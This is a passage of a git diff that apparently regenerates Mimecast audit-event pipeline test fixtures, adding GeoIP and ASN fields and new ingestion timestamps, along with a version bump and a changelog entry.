"2021-12-14T14:48:14.226962266Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" diff --git a/packages/microsoft/manifest.yml b/packages/microsoft/manifest.yml index fbb48ce9f13..675f307289b 100644 --- a/packages/microsoft/manifest.yml +++ b/packages/microsoft/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: microsoft title: Microsoft -version: 1.1.0 +version: 1.1.1 description: Deprecated. Use a specific Microsoft package instead. categories: - "network" diff --git a/packages/mimecast/changelog.yml b/packages/mimecast/changelog.yml index 87d46bf2d0e..6f5a62d3c11 100644 --- a/packages/mimecast/changelog.yml +++ b/packages/mimecast/changelog.yml @@ -1,3 +1,8 @@ +- version: "0.0.4" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.0.3" changes: - description: Change test public IPs to the supported subset diff --git a/packages/mimecast/data_stream/audit_events/_dev/test/pipeline/test-audit-events.log-expected.json b/packages/mimecast/data_stream/audit_events/_dev/test/pipeline/test-audit-events.log-expected.json index f11c9833871..0e873498751 100644 --- a/packages/mimecast/data_stream/audit_events/_dev/test/pipeline/test-audit-events.log-expected.json +++ b/packages/mimecast/data_stream/audit_events/_dev/test/pipeline/test-audit-events.log-expected.json @@ -19,11 +19,23 @@ ] }, "client": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "event": { "action": "threat-intel-feed-download", - "ingested": "2021-12-09T15:16:03.637458Z", + "ingested": "2021-12-14T14:48:19.342442297Z", "original": "{\"auditType\":\"Threat Intel Feed Download\",\"category\":\"reporting_logs\",\"eventInfo\":\"Threat intel multiple feeds download - malware_customer_csv_20211018094502564.zip, Date: 2021-10-18, Time: 08:45:02+0000, IP: 67.43.156.15, Application: Integrations\",\"eventTime\":\"2021-10-18T08:45:02+0000\",\"id\":\"eNqrVipOTS4tSs1MUbJS8im3dA5NjAxJTPP0svD1jioo9IsINgxL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxpbmRhoKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWACCXK48\",\"user\":\"johndoe@example.com\"}", "id": "eNqrVipOTS4tSs1MUbJS8im3dA5NjAxJTPP0svD1jioo9IsINgxL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxpbmRhoKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWACCXK48", "created": "2021-10-18T08:45:02.000Z" @@ -61,11 +73,23 @@ ] }, "client": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "event": { "action": "threat-intel-feed-download", - "ingested": "2021-12-09T15:16:03.637467Z", + "ingested": "2021-12-14T14:48:19.342444278Z", "original": "{\"id\": \"eNqrVipOTS4tSs1MUbJS8nbx8CoyTPFN9akM9K5KqnQyi8z2DgtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxoaG5grKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADbWK70\",\"auditType\": \"Threat Intel Feed Download\",\"user\": \"johndoe@example\",\"eventTime\": \"2021-10-10T22:51:57+0000\",\"eventInfo\": \"Threat intel multiple feeds download - malware_grid_csv_20211010235157027.zip, Date: 2021-10-10, Time: 22:51:57+0000, IP: 67.43.156.15, Application: Azure Sentinel\",\"category\": \"reporting_logs\"}", "id": "eNqrVipOTS4tSs1MUbJS8nbx8CoyTPFN9akM9K5KqnQyi8z2DgtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxoaG5grKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADbWK70", "created": "2021-10-10T22:51:57.000Z" @@ -99,11 +123,23 @@ ] }, "client": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "event": { "action": "user-logged-on", - "ingested": "2021-12-09T15:16:03.637473400Z", + "ingested": "2021-12-14T14:48:19.342444686Z", "original": "{\"id\": \"eNqrVipOTS4tSs1MUbJSivD0cisuyAirMgpxDy12dPNMMcn1zQlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkamhiqKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADo9K8A\",\"auditType\": \"User Logged On\",\"user\": \"johndoe@example.com\",\"eventTime\": \"2021-10-11T17:17:30+0000\",\"eventInfo\": \"Successful authentication for johndoe@example.com \u003cJohn Doe\u003e, Date: 2021-10-11, Time: 18:17:30 BST, IP: 67.43.156.15, Application: Administration Console, Method: Two Step Auth, 2FA: TOTP\",\"category\": \"authentication_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSivD0cisuyAirMgpxDy12dPNMMcn1zQlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkamhiqKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADo9K8A", "created": "2021-10-11T07:17:30.000Z" @@ -137,11 +173,23 @@ ] }, "client": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "event": { "action": "logon-requires-challenge", - "ingested": "2021-12-09T15:16:03.637479400Z", + "ingested": "2021-12-14T14:48:19.342445056Z", "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSSsos9DMJTPLyMA6NcCt2TA1OCwjLcwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkamhsqaOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAC8tK60\",\"auditType\":\"Logon Requires Challenge\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-11T17:17:26+0000\",\"eventInfo\":\"Intermediate authentication for johndoe@example.com \u003cJohn Doe\u003e, Date: 2021-10-11, Time: 18:17:26 BST, IP: 67.43.156.15, Application: Administration Console, Method: Office 365, 2FA: TOTP\",\"category\":\"authentication_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSSsos9DMJTPLyMA6NcCt2TA1OCwjLcwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkamhsqaOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAC8tK60", "created": "2021-10-11T07:17:26.000Z" @@ -175,11 +223,23 @@ ] }, "client": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "event": { "action": "user-logged-on", - "ingested": "2021-12-09T15:16:03.637485300Z", + "ingested": "2021-12-14T14:48:19.342445417Z", "original": "{ \"id\": \"eNqrVipOTS4tSs1MUbJS8o0ILw8pL_cyqQosLi-MzKjKcvMzCwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkYmZorKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAIqvLHI\", \"auditType\": \"User Logged On\", \"user\": \"johndoe@example.com\", \"eventTime\": \"2021-10-11T16:03:38+0000\", \"eventInfo\": \"Successful authentication for johndoe@example.com \u003cJohn Doe\u003e, Date: 2021-10-11, Time: 17:03:38 BST, IP: 67.43.156.15, Application: Administration Console, Method: Cloud\", \"category\": \"authentication_logs\"}", "id": "eNqrVipOTS4tSs1MUbJS8o0ILw8pL_cyqQosLi-MzKjKcvMzCwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkYmZorKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAIqvLHI", "created": "2021-10-11T06:03:38.000Z" @@ -213,11 +273,23 @@ ] }, "client": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "event": { "action": "mimecast-support-login", - "ingested": "2021-12-09T15:16:03.637491300Z", + "ingested": "2021-12-14T14:48:19.342445779Z", "original": "{ \"id\": \"eNqrVipOTS4tSs1MUbJSCkg09A93r0rNi9FPynHJ9gwJzyrzT8sJS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsZGJsaqyjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgCMPCxu\", \"auditType\": \"Mimecast Support Login\", \"user\": \"johdoe@example.local\", \"eventTime\": \"2021-10-11T15:39:17+0000\", \"eventInfo\": \"Action Performed - johdoe@example.local logged into this account. by johdoe@example.local\u003cjohdoe@example.local\u003e Date: 2021-10-11 Time: 16:39:17 +0100 IP: 67.43.156.15 Application: Administration Console\", \"category\": \"mimecast_access_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSCkg09A93r0rNi9FPynHJ9gwJzyrzT8sJS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsZGJsaqyjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgCMPCxu", "created": "2021-10-11T16:39:17.000Z" @@ -251,11 +323,23 @@ ] }, "client": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "event": { "action": "mimecast-support-login", - "ingested": "2021-12-09T15:16:03.637497300Z", + "ingested": "2021-12-14T14:48:19.342446134Z", "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSynStcDUudE51LQtJKc-M0TfwMjas8nQLS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGliZGhgYqSjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgBLJCvK\",\"auditType\":\"Mimecast Support Login\",\"user\":\"johndoe@example.local\",\"eventTime\":\"2021-10-19T11:46:40+0000\",\"eventInfo\":\"Action Performed - johdoe@example.local logged into this account. by johdoe@example.local\u003cjohdoe@example.local\u003e Date: 2021-10-19 Time: 12:46:40 +0100 IP: 67.43.156.15 Application: Administration Console\",\"category\":\"mimecast_access_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSynStcDUudE51LQtJKc-M0TfwMjas8nQLS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGliZGhgYqSjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgBLJCvK", "created": "2021-10-19T12:46:40.000Z" @@ -289,11 +373,23 @@ ] }, "client": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "event": { "action": "message-action", - "ingested": "2021-12-09T15:16:03.637503100Z", + "ingested": "2021-12-14T14:48:19.342446500Z", "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJS0nYKziswMy_18smyMDAs9w8P8PPNNAxL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkYmxopqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAOifKw8\",\"auditType\":\"Message Action\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-11T15:36:01+0000\",\"eventInfo\":\"Viewed Message - Source: Search, From: \u003cJohn Done\u003e johndoe@example.com, To: \u003cjohndoe@example.com\u003e johndoe@example.com, Subject: Test on Tues 28th Sept, Processed: 2021-09-28 07:59:23+0000, Viewed Content: True, Date: 2021-10-11, Time: 15:36:01+0000, IP: 67.43.156.15, Application: mimecast-case-review\",\"category\":\"case_review_logs\"}", "id": "eNqrVipOTS4tSs1MUbJS0nYKziswMy_18smyMDAs9w8P8PPNNAxL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkYmxopqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAOifKw8", "created": "2021-10-11T15:36:01.000Z" @@ -338,11 +434,23 @@ ] }, "client": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "event": { "action": "search-action", - "ingested": "2021-12-09T15:16:03.637509100Z", + "ingested": "2021-12-14T14:48:19.342446860Z", "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJS0i5MNHQtiqoo9Q53S0yu8sov8AszyAlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkYmxorKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAFqzLAw\",\"auditType\":\"Search Action\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-11T15:35:53+0000\",\"eventInfo\":\"Executed Search - Source: Search, Search Criteria: {\\\"keywords\\\":\\\"test\\\",\\\"mailboxes\\\":[\\\"johndoe@example.com\\\"],\\\"route\\\":\\\"ALL\\\",\\\"start\\\":\\\"2021-04-11T16:34:45+0100\\\",\\\"end\\\":\\\"2021-10-11T16:34:45+0100\\\"}, Date: 2021-10-11, Time: 15:35:53+0000, IP: 67.43.156.15, Application: mimecast-case-review\",\"category\":\"case_review_logs\"}", "id": "eNqrVipOTS4tSs1MUbJS0i5MNHQtiqoo9Q53S0yu8sov8AszyAlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkYmxorKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAFqzLAw", "created": "2021-10-11T15:35:53.000Z" @@ -376,11 +484,23 @@ ] }, "client": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "event": { "action": "logon-authentication-failed", - "ingested": "2021-12-09T15:16:03.637515300Z", + "ingested": "2021-12-14T14:48:19.342447313Z", "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSMk9PdXYMzywJrLLMzdT2TfVN8S8zNgxL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkbGFmoKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWACyMK6M\",\"auditType\":\"Logon Authentication Failed\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-11T14:46:10+0000\",\"eventInfo\":\"Creating the auditLog entry for failed authentication, emailAddress :com.example.sdk.address.Address@4a3bcd11[accountCode=ABC123,accountId=75,internal=false,emailAddress=johndoe@gmail.com,domainName=gmail.com,name=johndoe@gmail.com,aliasFor=0,type=0,journalService=false,id=275078533,aliases={},alternateAddresses={},alternateAliases={}] remote IP : 67.43.156.15 application : LFS\",\"category\":\"authentication_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSMk9PdXYMzywJrLLMzdT2TfVN8S8zNgxL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkbGFmoKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWACyMK6M" }, @@ -414,7 +534,7 @@ }, "event": { "action": "completed-directory-sync", - "ingested": "2021-12-09T15:16:03.637519200Z", + "ingested": "2021-12-14T14:48:19.342447674Z", "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSKnU29DVI9XJJMs6wMC9LqnAMccoxcwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkZGZqoqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAPQMKys\",\"auditType\":\"Completed Directory Sync\",\"user\":\"\",\"eventTime\":\"2021-10-11T13:21:06+0000\",\"eventInfo\":\"No changes found.\",\"category\":\"account_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSKnU29DVI9XJJMs6wMC9LqnAMccoxcwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkZGZqoqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAPQMKys" }, @@ -444,11 +564,23 @@ ] }, "client": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "event": { "action": "case-action", - "ingested": "2021-12-09T15:16:03.637524500Z", + "ingested": "2021-12-14T14:48:19.342448171Z", "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSSiwLM8srLCvJzg8s8HbydCpz0Y6oCAtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaG5ooKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAHTYLDo\",\"auditType\":\"Case Action\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T09:19:53+0000\",\"eventInfo\":\"Viewed Case - Case: Class Action, Date: 2021-10-12, Time: 09:19:53+0000, IP: 67.43.156.15, Application: mimecast-case-review\",\"category\":\"case_review_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSSiwLM8srLCvJzg8s8HbydCpz0Y6oCAtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaG5ooKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAHTYLDo", "created": "2021-10-12T09:19:53.000Z" @@ -482,12 +614,24 @@ ] }, "client": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "event": { "reason": "Reason: Wrong password", "action": "logon-authentication-failed", - "ingested": "2021-12-09T15:16:03.637543Z", + "ingested": "2021-12-14T14:48:19.342448528Z", "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSMvCrMHX2MzL1yLFITjJNd8rO9wiJyAlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaGRkoKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAPktKzg\",\"auditType\":\"Logon Authentication Failed\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T08:47:55+0000\",\"eventInfo\":\"Failed authentication for johndoe@example.com \u003cJohn Doe\u003e, Date: 2021-10-12, Time: 09:47:55 BST, IP: 67.43.156.15, Application: mimecast-moa, Method: Office 365, Reason: Wrong password\",\"category\":\"authentication_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSMvCrMHX2MzL1yLFITjJNd8rO9wiJyAlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaGRkoKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAPktKzg", "created": "2021-10-11T22:47:55.000Z" @@ -521,11 +665,23 @@ ] }, "client": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "event": { "action": "existing-archive-task-changed", - "ingested": "2021-12-09T15:16:03.637552300Z", + "ingested": "2021-12-14T14:48:19.342448913Z", "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSSnJMinKNMMtyDg3xKw2rDM91DC-JdAtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaGRooaOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAEQYK9w\",\"auditType\":\"Existing Archive Task Changed\",\"user\":\"johdoe@example.com\",\"eventTime\":\"2021-10-12T08:47:54+0000\",\"eventInfo\":\"Successfully updated 3 'Sync and Recover' tasks associated with legacy connection (\\\"365\\\") to new migrated connector (\\\"Sync and Recover - 365\\\"), Date: 2021-10-12, Time: 08:47:54+0000, IP: 67.43.156.15, Application: Administration Console\",\"category\":\"archive_service_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSSnJMinKNMMtyDg3xKw2rDM91DC-JdAtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaGRooaOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAEQYK9w", "created": "2021-10-12T08:47:54.000Z" @@ -559,11 +715,23 @@ ] }, "client": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "event": { "action": "connectors-management", - "ingested": "2021-12-09T15:16:03.637557100Z", + "ingested": "2021-12-14T14:48:19.342449302Z", "original": "{\"id\":\"eNoVzc0KgkAUQOF3uVsFuZma7qQ0UqiFqChuZH7M0iZmHMOid8_2h-98QDGiJespBDBgYwn-4orcHMrr_JqUWdjFBb8YThbF5bE6le_ardLGitJqnHF39w7YGuLsL5g8l7wAE1pN-2kQ3V-00bdt3KBrAtFqEiOTRFC2rvZbN_ScNZ-ZVL14QIDfH41XLGM\",\"auditType\":\"Connectors Management\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T08:47:53+0000\",\"eventInfo\":\"Connector creation for Microsoft O365\\nName: Sync and Recover - 365, Description: null, Product: Sync and Recover, App (provider): Microsoft O365\\nSuccess: true, Date: 2021-10-12, Time: 08:47:53+0000, IP: 67.43.156.15, Application: Administration Console\",\"category\":\"integrations_and_apis\"}", "id": "eNoVzc0KgkAUQOF3uVsFuZma7qQ0UqiFqChuZH7M0iZmHMOid8_2h-98QDGiJespBDBgYwn-4orcHMrr_JqUWdjFBb8YThbF5bE6le_ardLGitJqnHF39w7YGuLsL5g8l7wAE1pN-2kQ3V-00bdt3KBrAtFqEiOTRFC2rvZbN_ScNZ-ZVL14QIDfH41XLGM", "created": "2021-10-12T08:47:53.000Z" @@ -602,11 +770,23 @@ ] }, "client": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "event": { "action": "page-data-exports", - "ingested": "2021-12-09T15:16:03.637561700Z", + "ingested": "2021-12-14T14:48:19.342449695Z", "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSynAJ8yuoyA4z9ygMNyv21C42MC9IDwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkbmFhoqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADk2K8U\",\"auditType\":\"Page Data Exports\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T02:27:18+0000\",\"eventInfo\":\"[Export type : Download,Name :watchlist_view,Requested By :johdoe@example.com,Export time :Tue Oct 12 03:27:18 BST 2021,IP Address :67.43.156.15,Columns exported :Name|Email|Department|Number of Videos|,File name : export_at_watchlist_view_1634005638160.xlsx,File Size: 6864,File type : .xlsx], Date: 2021-10-12, Time: 02:27:18+0000, IP: 67.43.156.15, Application: mimecast-matfe\",\"category\":\"account_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSynAJ8yuoyA4z9ygMNyv21C42MC9IDwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxkbmFhoqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADk2K8U", "created": "2021-10-12T02:27:18.000Z" @@ -640,11 +820,23 @@ ] }, "client": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "event": { "action": "custom-report-definition-created", - "ingested": "2021-12-09T15:16:03.637565500Z", + "ingested": "2021-12-14T14:48:19.342450168Z", "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSMi8zSc3J8M4Od_NwjdHPMDYzdfGO8MkJS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsZGppaKajlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgAmqSuF\",\"auditType\":\"Custom Report Definition Created\",\"user\":\"johndoe@example.local\",\"eventTime\":\"2021-10-11T19:53:41+0000\",\"eventInfo\":\"Action Performed - Custom Report Definition Created with name \\\"Terri test\\\" and description \\\"all user - per email report\\\" by johndoe@example.local\u003cjohndoe@example.local\u003e Date: 2021-10-11 Time: 20:53:41 +0100 IP: 67.43.156.15 Application: Administration Console\",\"category\":\"reporting_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSMi8zSc3J8M4Od_NwjdHPMDYzdfGO8MkJS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsZGppaKajlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgAmqSuF", "created": "2021-10-11T20:53:41.000Z" @@ -677,11 +869,23 @@ ] }, "client": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "event": { "action": "folder-log-entry", - "ingested": "2021-12-09T15:16:03.637570300Z", + "ingested": "2021-12-14T14:48:19.342450570Z", "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSCij080lzDChMMjXw8o3IjnCLDIrRT8wJS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsZGpiYaqjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgBNvCvh\",\"auditType\":\"Folder Log Entry\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-11T18:23:10+0000\",\"eventInfo\":\"Action Performed - Deleted New Folder by johndoe@example.com\u003cJohn Doe\u003e Date: 2021-10-11 Time: 19:23:10 +0100 IP: 67.43.156.15 Application: Administration Console\",\"category\":\"profile_group_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSCij080lzDChMMjXw8o3IjnCLDIrRT8wJS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsZGpiYaqjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgBNvCvh", "created": "2021-10-11T19:23:10.000Z" @@ -711,7 +915,7 @@ }, "event": { "action": "user-password-changed", - "ingested": "2021-12-09T15:16:03.637576500Z", + "ingested": "2021-12-14T14:48:19.342450983Z", "original": 